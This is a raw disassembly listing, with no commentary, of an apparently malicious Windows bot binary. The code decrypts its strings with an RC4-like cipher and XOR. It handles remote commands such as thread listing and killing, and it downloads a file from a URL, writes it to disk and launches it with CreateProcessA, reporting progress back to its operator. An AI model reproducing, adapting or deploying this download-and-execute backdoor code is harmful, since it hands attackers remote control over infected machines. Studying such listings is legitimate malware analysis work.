push dword ptr [esi+4]
push offset aK ; "k"
call edi ; dword_47B4E0
test eax, eax
jnz loc_4026CA
loc_40262E: ; CODE XREF: sub_401B8B+A8F�j
mov eax, [esi+8]
cmp eax, ebx
jz loc_402893
push eax
push offset dword_40E000
call edi ; dword_47B4E0
test eax, eax
jnz short loc_40267F
call sub_4010CD
cmp eax, ebx
jle short loc_402667
cmp [ebp+arg_14], ebx
jnz loc_402893
push eax
push offset dword_4101C4
push offset aSSDTS_ ; "%s S: <%d> t(s)."
jmp loc_402854
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_401B8B+AC1�j
cmp [ebp+arg_14], ebx
jnz loc_402893
push offset dword_4101C4
push offset aSN_ ; "%s N."
jmp loc_401E30
; ---------------------------------------------------------------------------
loc_40267F: ; CODE XREF: sub_401B8B+AB8�j
push dword ptr [esi+8]
call ds:dword_47B600 ; atoi
push eax
call sub_40106E
pop ecx
test eax, eax
pop ecx
jz short loc_4026AF
cmp [ebp+arg_14], ebx
jnz loc_402893
push dword ptr [esi+8]
push offset dword_4101C4
push offset aSKTS ; "%s K t: <%s>"
jmp loc_402854
; ---------------------------------------------------------------------------
loc_4026AF: ; CODE XREF: sub_401B8B+B07�j
cmp [ebp+arg_14], ebx
jnz loc_402893
push dword ptr [esi+8]
push offset dword_4101C4
push offset aSFToKTS ; "%s F to k t: <%s>"
jmp loc_402854
; ---------------------------------------------------------------------------
loc_4026CA: ; CODE XREF: sub_401B8B+A7F�j
; sub_401B8B+A9D�j
push 2
call sub_401226
cmp eax, ebx
pop ecx
jle short loc_4026EF
cmp [ebp+arg_14], ebx
jnz loc_402893
push eax
push offset aTlist ; "tlist"
push offset dword_4101C4
jmp loc_401EDA
; ---------------------------------------------------------------------------
loc_4026EF: ; CODE XREF: sub_401B8B+B49�j
mov eax, [ebp+arg_14]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_1C]
mov [ebp+var_20], eax
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_D0]
push eax
call sub_40C25E ; strcpy
mov esi, [esi+4]
mov eax, [ebp+arg_10]
pop ecx
cmp esi, ebx
pop ecx
mov [ebp+var_D4], eax
jz short loc_402731
push offset aSub ; "sub"
push esi
call edi ; dword_47B4E0
neg eax
sbb eax, eax
inc eax
mov [ebp+var_40], eax
jmp short loc_402734
; ---------------------------------------------------------------------------
loc_402731: ; CODE XREF: sub_401B8B+B92�j
mov [ebp+var_40], ebx
loc_402734: ; CODE XREF: sub_401B8B+BA4�j
mov esi, offset dword_4101C4
push esi
push offset dword_40F7F0
push 2
call sub_401073
add esp, 0Ch
mov [ebp+var_50], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_D4]
push ebx
push eax
push offset sub_40115E
push ebx
push ebx
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_50]
imul ecx, 220h
cmp eax, ebx
mov dword_427630[ecx], eax
jz short loc_40278B
loc_402778: ; CODE XREF: sub_401B8B+BFE�j
cmp [ebp+var_18], ebx
jnz loc_402893
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_402778
; ---------------------------------------------------------------------------
loc_40278B: ; CODE XREF: sub_401B8B+BEB�j
cmp [ebp+arg_14], ebx
jnz loc_402893
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
push offset aTlist ; "tlist"
push esi
jmp loc_402035
; ---------------------------------------------------------------------------
loc_4027A6: ; CODE XREF: sub_401B8B+19E�j
; sub_401B8B+1AF�j
push ebx
push ebx
call sub_4012C1
cmp [ebp+arg_14], ebx
pop ecx
pop ecx
jnz short loc_4027BC
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
jmp short loc_4027C4
; ---------------------------------------------------------------------------
loc_4027BC: ; CODE XREF: sub_401B8B+C27�j
mov eax, [ebp+arg_C]
push offset dword_40F7EC
loc_4027C4: ; CODE XREF: sub_401B8B+C2F�j
push dword ptr [eax+4]
push dword ptr [eax]
push offset dword_40F758
push [ebp+arg_10]
call sub_4012AD
add esp, 14h
push 7D0h
call ds:dword_47B4EC ; Sleep
mov ecx, [ebp+arg_10]
call sub_401217
call dword_413DBC ; WSACleanup
push ebx
call ds:dword_47B514 ; ExitProcess
loc_4027F9: ; CODE XREF: sub_401B8B+17C�j
; sub_401B8B+18D�j
mov esi, [esi+4]
cmp esi, ebx
jz short loc_40285C
push esi
call ds:dword_47B600 ; atoi
mov esi, eax
pop ecx
cmp esi, ebx
jl short loc_402844
cmp esi, 2
jge short loc_402844
mov ecx, [ebp+arg_10]
push esi
call sub_40113B
test eax, eax
jz short loc_402832
cmp [ebp+arg_14], ebx
jnz short loc_402893
push esi
push offset dword_4101B8
push offset aSSIOut_ ; "%s S <%i> out."
jmp short loc_402854
; ---------------------------------------------------------------------------
loc_402832: ; CODE XREF: sub_401B8B+C93�j
cmp [ebp+arg_14], ebx
jnz short loc_402893
push esi
push offset dword_4101B8
push offset aSNoLI ; "%s No L: <%i>"
jmp short loc_402854
; ---------------------------------------------------------------------------
loc_402844: ; CODE XREF: sub_401B8B+C81�j
; sub_401B8B+C86�j
cmp [ebp+arg_14], ebx
jnz short loc_402893
push esi
push offset dword_4101B8
push offset aSII ; "%s I: <%i>"
loc_402854: ; CODE XREF: sub_401B8B+AD7�j
; sub_401B8B+B1F�j ...
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
jmp short loc_402888
; ---------------------------------------------------------------------------
loc_40285C: ; CODE XREF: sub_401B8B+C73�j
mov esi, [ebp+arg_C]
mov ecx, [ebp+arg_10]
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_4011C7
cmp eax, 0FFFFFFFFh
jz short loc_402893
cmp [ebp+arg_14], ebx
jnz short loc_402893
push dword ptr [esi]
push offset dword_4101B8
push offset aSSOut_ ; "%s %s out."
push dword ptr [esi+0Ch]
loc_402888: ; CODE XREF: sub_401B8B+CCF�j
push [ebp+arg_10]
call sub_40104B
add esp, 14h
loc_402893: ; CODE XREF: sub_401B8B+27�j
; sub_401B8B+38�j ...
push 1
pop eax
loc_402896: ; CODE XREF: sub_401B8B+2F9�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B8B endp
; ---------------------------------------------------------------------------
db 344h dup(0CCh)
; ---------------------------------------------------------------------------
loc_402BDF: ; CODE XREF: UPX0:00401140�j
push esi
push edi
push dword ptr [esp+0Ch]
call sub_40C28E ; strlen
mov esi, eax
lea eax, [esi+1]
push eax
call sub_40C288
push dword ptr [esp+14h]
mov edi, eax
push edi
call sub_40C25E ; strcpy
add esp, 10h
xor eax, eax
test esi, esi
jle short loc_402C12
loc_402C0A: ; CODE XREF: UPX0:00402C10�j
xor [eax+edi], al
inc eax
cmp eax, esi
jl short loc_402C0A
loc_402C12: ; CODE XREF: UPX0:00402C08�j
and byte ptr [edi+esi], 0
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C2A proc near ; CODE XREF: sub_40105A�j
var_244 = byte ptr -244h
var_140 = byte ptr -140h
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 244h
push ebx
push esi
lea eax, [ebp+var_3C]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov [ebp+var_3C], 0Ah
mov [ebp+var_3B], 0Eh
mov [ebp+var_3A], 20h
mov [ebp+var_39], 48h
mov [ebp+var_38], 0Bh
mov [ebp+var_37], 2Bh
mov [ebp+var_36], 0Ch
mov [ebp+var_35], 23h
mov [ebp+var_34], 3Ah
mov [ebp+var_33], 27h
mov [ebp+var_32], 28h
mov [ebp+var_31], 5Eh
mov [ebp+var_30], 2Ah
mov [ebp+var_2F], 1Eh
mov [ebp+var_2E], 2Dh
mov [ebp+var_2D], 5Ah
mov [ebp+var_2C], 1Bh
mov [ebp+var_2B], 0Fh
mov [ebp+var_2A], 4Ch
mov [ebp+var_29], 44h
mov [ebp+var_28], 16h
mov [ebp+var_27], 4
mov [ebp+var_26], 57h
mov [ebp+var_25], 23h
mov [ebp+var_24], 11h
mov [ebp+var_23], 53h
mov [ebp+var_22], 38h
mov [ebp+var_21], 13h
mov [ebp+var_20], 0Dh
mov [ebp+var_1F], 12h
mov [ebp+var_1E], 25h
mov [ebp+var_1D], 1Ch
mov [ebp+var_1C], 30h
mov [ebp+var_1B], 12h
mov [ebp+var_1A], 50h
mov [ebp+var_19], 4Fh
mov [ebp+var_18], 39h
mov [ebp+var_17], 10h
mov [ebp+var_16], 42h
mov [ebp+var_15], 1Fh
mov [ebp+var_14], 37h
mov [ebp+var_13], 1Dh
mov [ebp+var_12], 41h
mov [ebp+var_11], 55h
mov [ebp+var_10], 2Ch
mov [ebp+var_F], 41h
mov [ebp+var_E], 2Ch
mov [ebp+var_D], 58h
mov [ebp+var_C], bl
call sub_40C28E ; strlen
mov esi, 101h
mov [ebp+var_8], eax
push esi
lea eax, [ebp+var_140]
push ebx
push eax
call sub_40C294 ; memset
push esi
lea eax, [ebp+var_244]
push ebx
push eax
call sub_40C294 ; memset
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_402D34: ; CODE XREF: sub_402C2A+114�j
mov [ebp+eax+var_140], al
inc eax
cmp eax, ecx
jb short loc_402D34
xor esi, esi
loc_402D42: ; CODE XREF: sub_402C2A+12E�j
cmp edi, [ebp+var_8]
jnz short loc_402D49
xor edi, edi
loc_402D49: ; CODE XREF: sub_402C2A+11B�j
mov al, [ebp+edi+var_3C]
inc edi
mov [ebp+esi+var_244], al
inc esi
cmp esi, ecx
jb short loc_402D42
mov [ebp+var_4], ebx
xor edi, edi
mov eax, 0FFh
loc_402D64: ; CODE XREF: sub_402C2A+174�j
mov dl, [ebp+edi+var_140]
mov ebx, [ebp+var_4]
mov cl, [ebp+edi+var_244]
lea esi, [ebp+edi+var_140]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+var_4], ecx
cmp edi, 100h
mov bl, [ebp+ecx+var_140]
lea ecx, [ebp+ecx+var_140]
mov [esi], bl
mov [ecx], dl
jb short loc_402D64
xor edi, edi
cmp [ebp+arg_4], edi
mov [ebp+var_4], edi
mov [ebp+var_8], edi
jbe short loc_402DFC
loc_402DAD: ; CODE XREF: sub_402C2A+1D0�j
inc edi
and edi, eax
mov dl, [ebp+edi+var_140]
lea ecx, [ebp+edi+var_140]
mov bl, dl
add ebx, [ebp+var_4]
and ebx, eax
mov esi, ebx
mov bl, [ebp+esi+var_140]
mov [ebp+var_4], esi
mov [ecx], bl
lea esi, [ebp+esi+var_140]
mov ebx, [ebp+var_8]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+arg_0]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx+var_140]
xor [esi], cl
inc ebx
cmp ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
jb short loc_402DAD
loc_402DFC: ; CODE XREF: sub_402C2A+181�j
pop edi
pop esi
pop ebx
leave
retn
sub_402C2A endp
; ---------------------------------------------------------------------------
db 75h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402E76 proc near ; CODE XREF: sub_4010E6�j
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_40C28E ; strlen
test eax, eax
pop ecx
jbe short loc_402E99
loc_402E89: ; CODE XREF: sub_402E76+21�j
xor byte ptr [esi+edi], 0D7h
push edi
inc esi
call sub_40C28E ; strlen
cmp esi, eax
pop ecx
jb short loc_402E89
loc_402E99: ; CODE XREF: sub_402E76+11�j
pop edi
pop esi
retn
sub_402E76 endp
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EA5 proc near ; CODE XREF: sub_401014�j
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
push edi
push esi
mov edi, offset dword_40FBA0
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
mov edi, offset dword_40FBAC
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
mov edi, offset dword_40FBB0
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
mov edi, offset dword_40FBBC
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
mov edi, offset dword_40FBD4
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
mov edi, offset dword_40FBEC
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
mov ebx, [ebp+arg_0]
add esp, 10h
cmp ebx, esi
jle short loc_402F64
mov edi, offset off_40FC10
loc_402F49: ; CODE XREF: sub_402EA5+BD�j
push esi
push esi
push dword ptr [edi]
call sub_40C28E ; strlen
pop ecx
push eax
push dword ptr [edi]
call sub_40105A
add esp, 10h
add edi, 4
dec ebx
jnz short loc_402F49
loc_402F64: ; CODE XREF: sub_402EA5+9D�j
mov eax, [ebp+arg_8]
cmp eax, esi
jle loc_40304C
mov edi, offset dword_40FD20
mov [ebp+arg_0], eax
loc_402F77: ; CODE XREF: sub_402EA5+1A1�j
lea ebx, [edi-100h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
push esi
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
lea ebx, [edi+18h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+2Ah]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+3Ah]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+46h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+52h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+64h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
lea ebx, [edi+76h]
push esi
push esi
push ebx
call sub_40C28E ; strlen
pop ecx
push eax
push ebx
call sub_40105A
add esp, 10h
add edi, 188h
dec [ebp+arg_0]
jnz loc_402F77
loc_40304C: ; CODE XREF: sub_402EA5+C4�j
push esi
mov edi, offset dword_40FDAC
push esi
push edi
call sub_40C28E ; strlen
pop ecx
push eax
push edi
call sub_40105A
add esp, 10h
push esi
push esi
mov esi, offset byte_40FEAB
push esi
call sub_40C28E ; strlen
pop ecx
push eax
push esi
call sub_40105A
add esp, 10h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402EA5 endp
; ---------------------------------------------------------------------------
db 77h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4030F8: ; CODE XREF: sub_401041�j
push ebp
mov ebp, esp
sub esp, 730h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 30h
mov esi, eax
pop ecx
lea edi, [ebp-0F0h]
rep movsd
push 1
mov esi, ds:dword_47B614
pop edi
mov [eax+0BCh], edi
mov eax, [ebp-0F0h]
push 100h
mov [ebp+8], eax
push dword ptr [ebp-68h]
lea eax, [ebp-52Ch]
push eax
call esi ; dword_47B614
push 104h
lea eax, [ebp-238h]
push dword ptr [ebp-64h]
push eax
call esi ; dword_47B614
add esp, 18h
xor ebx, ebx
lea eax, [ebp-52Ch]
push ebx
push ebx
push ebx
push ebx
push eax
push dword_413E28
call dword_413D58 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp-14h], eax
jz loc_4035EB
push ebx
push ebx
push 2
push ebx
push ebx
lea eax, [ebp-238h]
push 40000000h
push eax
call ds:dword_47B4C0 ; CreateFileA
cmp eax, edi
mov [ebp-18h], eax
jnb short loc_4031E0
cmp [ebp-38h], ebx
jnz short loc_4031C7
cmp [ebp-5Ch], ebx
mov eax, offset dword_4101EC
jnz short loc_4031A8
mov eax, offset dword_4101E0
loc_4031A8: ; CODE XREF: UPX0:004031A1�j
lea ecx, [ebp-238h]
push ecx
push eax
lea eax, [ebp-0ECh]
push offset aSCgS_ ; "%s Cg: %s."
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 14h
loc_4031C7: ; CODE XREF: UPX0:00403197�j
push dword ptr [ebp-14h]
call dword_413EDC ; InternetCloseHandle
push dword ptr [ebp-6Ch]
call sub_401235
pop ecx
push ebx
call ds:dword_47B4C4 ; ExitThread
loc_4031E0: ; CODE XREF: UPX0:00403192�j
mov esi, ds:dword_47B4E8
mov [ebp-4], ebx
call esi ; dword_47B4E8
mov edi, 7D000h
mov [ebp-0Ch], eax
push edi
call ds:dword_47B5DC ; malloc
pop ecx
mov [ebp-1Ch], eax
loc_4031FE: ; CODE XREF: UPX0:00403275�j
push 202h
lea eax, [ebp-730h]
push ebx
push eax
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp-8]
push eax
lea eax, [ebp-730h]
push 202h
push eax
push dword ptr [ebp-14h]
call dword_413D60 ; InternetReadFile
lea eax, [ebp-30h]
push ebx
push eax
lea eax, [ebp-730h]
push dword ptr [ebp-8]
push eax
push dword ptr [ebp-18h]
call ds:dword_47B4D4 ; WriteFile
mov ecx, [ebp-4]
cmp ecx, edi
jnb short loc_40326D
mov eax, edi
sub eax, ecx
cmp eax, [ebp-8]
jbe short loc_403257
mov eax, [ebp-8]
loc_403257: ; CODE XREF: UPX0:00403252�j
push eax
lea eax, [ebp-730h]
push eax
mov eax, [ebp-1Ch]
add eax, ecx
push eax
call sub_40C2A6 ; memcpy
add esp, 0Ch
loc_40326D: ; CODE XREF: UPX0:00403249�j
mov eax, [ebp-8]
add [ebp-4], eax
cmp eax, ebx
ja short loc_4031FE
call esi ; dword_47B4E8
sub eax, [ebp-0Ch]
xor edx, edx
mov ecx, 3E8h
push dword ptr [ebp-1Ch]
div ecx
xor edx, edx
mov ecx, eax
mov eax, [ebp-4]
inc ecx
div ecx
mov edi, eax
call ds:dword_47B5E4 ; free
pop ecx
push dword ptr [ebp-18h]
call ds:dword_47B520 ; CloseHandle
push dword ptr [ebp-14h]
call dword_413EDC ; InternetCloseHandle
cmp [ebp-38h], ebx
jnz short loc_40330B
cmp [ebp-5Ch], ebx
mov eax, offset dword_4101EC
jnz short loc_4032C1
mov eax, offset dword_4101E0
loc_4032C1: ; CODE XREF: UPX0:004032BA�j
mov [ebp-10h], edi
mov [ebp-0Ch], ebx
fild qword ptr [ebp-10h]
push ecx
push ecx
lea ecx, [ebp-238h]
mov [ebp-0Ch], ebx
fmul dbl_40E0C0
fstp qword ptr [esp]
push ecx
mov ecx, [ebp-4]
mov [ebp-10h], ecx
push ecx
fild qword ptr [ebp-10h]
push ecx
fmul dbl_40E0C0
fstp qword ptr [esp]
push eax
lea eax, [ebp-0ECh]
push offset aSDl_1fkbToS@_1 ; "%s dl: %.1fKB to: %s @ %.1fKB/sec."
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 24h
loc_40330B: ; CODE XREF: UPX0:004032B0�j
cmp [ebp-5Ch], ebx
jnz loc_403540
cmp [ebp-58h], ebx
jz loc_40361E
mov edi, [ebp-54h]
lea eax, [ebp-238h]
push 104h
push eax
lea eax, [ebp-42Ch]
push eax
call ds:dword_47B614 ; strncpy
add esp, 0Ch
lea eax, [ebp-42Ch]
push eax
call dword_413E08 ; PathRemoveFileSpecA
test eax, eax
jnz short loc_40337E
cmp [ebp-38h], ebx
jnz loc_403419
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
push offset dword_4101E0
lea eax, [ebp-0ECh]
push offset aSErrorD ; "%s error: <%d>"
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 14h
jmp loc_403419
; ---------------------------------------------------------------------------
loc_40337E: ; CODE XREF: UPX0:0040334B�j
push 44h
lea eax, [ebp-134h]
push ebx
push eax
call sub_40C294 ; memset
push 10h
lea eax, [ebp-2Ch]
push ebx
push eax
call sub_40C294 ; memset
add esp, 18h
lea eax, [ebp-2Ch]
neg edi
push eax
lea eax, [ebp-134h]
push eax
lea eax, [ebp-42Ch]
push eax
push ebx
sbb edi, edi
push ebx
push ebx
and edi, 0FFFFFFFBh
push ebx
lea eax, [ebp-238h]
push ebx
add edi, 5
push eax
push ebx
mov dword ptr [ebp-134h], 44h
mov dword ptr [ebp-108h], 1
mov [ebp-104h], di
call ds:dword_47B4CC ; CreateProcessA
test eax, eax
jnz short loc_403423
cmp [ebp-38h], ebx
jnz short loc_403419
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-238h]
push eax
push offset dword_4101E0
lea eax, [ebp-0ECh]
push offset aSFailedSErrorD ; "%s Failed: \"%s\", error: <%d>"
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 18h
loc_403419: ; CODE XREF: UPX0:00403350�j
; UPX0:00403379�j ...
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: UPX0:004033E8�j
call esi ; dword_47B4E8
cmp [ebp-38h], ebx
mov edi, eax
jnz short loc_403452
push dword ptr [ebp-24h]
lea eax, [ebp-238h]
push eax
push offset dword_4101E0
lea eax, [ebp-0ECh]
push offset aSCreatedSPidD ; "%s Created: \"%s\", PID: <%d>"
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 18h
loc_403452: ; CODE XREF: UPX0:0040342A�j
cmp [ebp-3Ch], ebx
jz loc_40351B
push 0FFFFFFFFh
push dword ptr [ebp-2Ch]
call ds:dword_47B4D0 ; WaitForSingleObject
call esi ; dword_47B4E8
sub eax, edi
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
mov [ebp-328h], bl
div ecx
mov ecx, 0E10h
mov edi, ecx
mov esi, edx
xor edx, edx
mov eax, esi
div edi
xor edx, edx
mov edi, eax
mov eax, esi
div ecx
pop esi
push esi
mov ecx, edx
xor edx, edx
mov eax, ecx
div esi
xor edx, edx
mov esi, ds:dword_47B5FC
mov [ebp-0Ch], eax
mov eax, ecx
pop ecx
div ecx
cmp edi, ebx
mov [ebp+8], edx
jbe short loc_4034F1
cmp edi, 1
mov eax, offset aHour ; " hour"
jz short loc_4034CB
mov eax, offset aHours ; " hours"
loc_4034CB: ; CODE XREF: UPX0:004034C4�j
push eax
push edi
lea eax, [ebp-2B0h]
push offset aDS ; " %d%s"
push eax
call esi ; dword_47B5FC
lea eax, [ebp-2B0h]
push eax
lea eax, [ebp-328h]
push eax
call sub_40C29A ; strcat
add esp, 18h
loc_4034F1: ; CODE XREF: UPX0:004034BA�j
push dword ptr [ebp+8]
lea eax, [ebp-2B0h]
push dword ptr [ebp-0Ch]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call esi ; dword_47B5FC
lea eax, [ebp-2B0h]
push eax
lea eax, [ebp-328h]
push eax
call sub_40C29A ; strcat
add esp, 18h
loc_40351B: ; CODE XREF: UPX0:00403455�j
cmp [ebp-2Ch], ebx
jz short loc_403529
push dword ptr [ebp-2Ch]
call ds:dword_47B520 ; CloseHandle
loc_403529: ; CODE XREF: UPX0:0040351E�j
cmp [ebp-28h], ebx
jz loc_40361E
push dword ptr [ebp-28h]
call ds:dword_47B520 ; CloseHandle
jmp loc_40361E
; ---------------------------------------------------------------------------
loc_403540: ; CODE XREF: UPX0:0040330E�j
push 10h
lea eax, [ebp-2Ch]
push ebx
push eax
call sub_40C294 ; memset
push 44h
lea eax, [ebp-134h]
pop esi
push esi
push ebx
push eax
call sub_40C294 ; memset
add esp, 18h
lea eax, [ebp-2Ch]
mov [ebp-134h], esi
mov [ebp-104h], bx
push eax
lea eax, [ebp-134h]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
lea eax, [ebp-238h]
push ebx
push eax
push ebx
call ds:dword_47B4CC ; CreateProcessA
cmp eax, 1
jnz short loc_4035D3
xor eax, eax
cmp dword ptr [ebp-50h], 1
setz al
push eax
push 1
call sub_4012C1
push offset dword_40F770
push dword ptr [ebp+8]
call sub_4012AD
add esp, 10h
push 7D0h
call ds:dword_47B4EC ; Sleep
mov ecx, [ebp+8]
call sub_401217
call dword_413DBC ; WSACleanup
push ebx
call ds:dword_47B514 ; ExitProcess
loc_4035D3: ; CODE XREF: UPX0:00403590�j
cmp [ebp-38h], ebx
jnz short loc_40361E
lea eax, [ebp-238h]
push eax
push offset dword_4101EC
push offset aSErrorS_ ; "%s Error: %s."
jmp short loc_40360C
; ---------------------------------------------------------------------------
loc_4035EB: ; CODE XREF: UPX0:0040316F�j
cmp [ebp-38h], ebx
jnz short loc_40361E
cmp [ebp-5Ch], ebx
mov esi, offset dword_4101EC
jnz short loc_4035FF
mov esi, offset dword_4101E0
loc_4035FF: ; CODE XREF: UPX0:004035F8�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
push esi
push offset aSErrorD ; "%s error: <%d>"
loc_40360C: ; CODE XREF: UPX0:004035E9�j
lea eax, [ebp-0ECh]
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 14h
loc_40361E: ; CODE XREF: UPX0:00403317�j
; UPX0:0040352C�j ...
push dword ptr [ebp-6Ch]
call sub_401235
pop ecx
push ebx
call ds:dword_47B4C4 ; ExitThread
; ---------------------------------------------------------------------------
asc_40362E db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌè',7,0
align 10h
jmp loc_403793
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; ---------------------------------------------------------------------------
mov ecx, offset dword_413860
jmp loc_40107D
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; ---------------------------------------------------------------------------
loc_403793: ; CODE XREF: UPX0:00403780�j
push offset loc_4037A2
call sub_40C2EC
pop ecx
retn
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4037A2: ; DATA XREF: UPX0:loc_403793�o
mov ecx, offset dword_413860
jmp loc_40102D
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037AE proc near ; CODE XREF: sub_401262�j
var_31C = byte ptr -31Ch
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 31Ch
push esi
call sub_4011B3
call sub_401294
push dword_410200
push dword_413900
